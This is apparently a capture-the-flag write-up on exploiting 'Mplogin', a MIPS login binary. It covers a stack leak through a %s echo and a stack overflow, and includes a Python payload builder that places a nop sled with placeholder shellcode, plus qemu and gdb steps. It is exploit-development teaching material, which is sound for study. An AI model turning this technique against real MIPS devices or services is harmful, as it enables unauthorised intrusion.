Sorting out MIPS

Tools

mipsrop (IDA plugin for finding ROP gadgets in MIPS binaries)

Challenges

Mplogin

$file Mplogin 
Mplogin: ELF 32-bit LSB executable, MIPS, MIPS32 version 1 (SYSV), dynamically linked, interpreter /lib/ld-uClibc.so.0, stripped

$checksec Mplogin
[*] '/home/wendy/Desktop/mips/Mplogin/Mplogin'
Arch: mips-32-little
RELRO: No RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x400000)
RWX: Has RWX segments

Run it with qemu in user mode, using mipsel (little-endian).

$tree -N -L 2
.
├── lib
│   ├── ld-uClibc.so.0
│   └── libc.so.0
└── Mplogin

1 directory, 3 files

The challenge ships its own lib directory, so pass -L ./ to make qemu load the loader and libc from the current directory.

$qemu-mipsel -L ./ Mplogin 
-----we1c0me t0 MP l0g1n s7stem-----
Username :

Analyze it in IDA.

sub_400840 prints the input buffer back with %s, which leaks stack contents: printf keeps reading past our input until it hits a NUL byte.

sub_400978 has a stack overflow. With no canary and NX disabled (see the checksec output above), it can be used to return into shellcode placed on the stack, using the stack address recovered from the %s leak.
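The two primitives above are normally combined as: parse the stack address out of the %s echo, then build an overflow payload whose return address points into a NOP sled on the stack. The following is an added example (not code from the original write-up) that does exactly that with plain struct, so it runs offline without pwntools or qemu. The echo bytes are constructed for illustration, and ret_offset and sled_delta are assumed values that you would measure under gdb for the real binary; the shellcode bytes are a placeholder to be replaced with real MIPSel shellcode. The nop sled uses xor $t0,$t0,$t0, a NUL-free MIPS instruction that is a no-op in this context, because the canonical MIPS nop (0x00000000) would terminate a string copy. On real MIPS hardware you would also want to trigger a cache flush (e.g. call sleep()) before jumping to freshly written stack shellcode, since the instruction cache may hold stale data; under qemu-user this is not an issue.

```python
import struct

PROMPT = b"Username : "
USERNAME = b"admin"

# Constructed sample echo (not captured from the real service): the program
# prints the username back with %s and runs past the 5 input bytes into the
# adjacent stack, leaking a little-endian pointer 0x7fff6e20 plus one more
# byte before a NUL stops the print.
SAMPLE_ECHO = b"Username : admin\x20\x6e\xff\x7f\x01"

# xor $t0,$t0,$t0 (0x01084026) in little-endian byte order: a no-op without NUL bytes.
MIPSEL_NOP = b"\x26\x40\x08\x01"


def extract_leak(echo: bytes, prompt: bytes, username: bytes) -> bytes:
    """Return the bytes printed after our own input, i.e. the leaked stack data."""
    start = echo.index(prompt + username) + len(prompt) + len(username)
    return echo[start:]


def find_stack_pointers(leak: bytes, low: int = 0x7F000000, high: int = 0x80000000):
    """Scan every byte offset for 32-bit little-endian words in the qemu-user stack range."""
    hits = []
    for off in range(0, len(leak) - 3):
        val = struct.unpack_from("<I", leak, off)[0]
        if low <= val < high:
            hits.append((off, val))
    return hits


def build_payload(ret_offset: int, leaked_sp: int, sled_delta: int,
                  shellcode: bytes, sled_words: int = 16) -> bytes:
    """
    ret_offset : bytes from buffer start to the saved $ra slot (assumed; measure in gdb)
    leaked_sp  : stack address recovered from the %s leak
    sled_delta : assumed distance from leaked_sp to where the sled starts on the stack
    Jumps into the middle of the sled so small miscalculations still land on a nop.
    """
    sled = MIPSEL_NOP * sled_words
    target = leaked_sp + sled_delta + (sled_words // 2) * len(MIPSEL_NOP)
    if target % 4:
        raise ValueError("MIPS requires a 4-byte aligned jump target")
    return b"A" * ret_offset + struct.pack("<I", target) + sled + shellcode


def has_nul(payload: bytes) -> bool:
    """True if the payload contains a NUL, which would truncate a strcpy/scanf-style read."""
    return b"\x00" in payload


if __name__ == "__main__":
    leak = extract_leak(SAMPLE_ECHO, PROMPT, USERNAME)
    ptrs = find_stack_pointers(leak)
    print("leak:", leak.hex(), "candidates:", [hex(v) for _, v in ptrs])
    # 0x40 and 0x10 are placeholder offsets for this demo, not values from the challenge.
    payload = build_payload(0x40, ptrs[0][1], 0x10, b"\xcc" * 8)
    print("payload bytes:", len(payload), "contains NUL:", has_nul(payload))
```

Feed the payload to the second input (sub_400978) after reading the first echo; if has_nul() reports True, check how the binary reads the input before relying on the bytes after the NUL.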

Start qemu with -g 1237 so it waits for a gdb connection on port 1237, then drive the program as before:
$qemu-mipsel -g 1237 -L ./ Mplogin 
-----we1c0me t0 MP l0g1n s7stem-----
Username : adminbbbb

Attach from gdb-multiarch (the binary is stripped, so break on raw addresses):
$gdb-multiarch 
pwndbg> ls
lib Mplogin
pwndbg> file Mplogin
Reading symbols from Mplogin...
(No debugging symbols found in Mplogin)
pwndbg> set architecture mips
The target architecture is assumed to be mips
pwndbg> target remote :1237
pwndbg> b *0x00400920
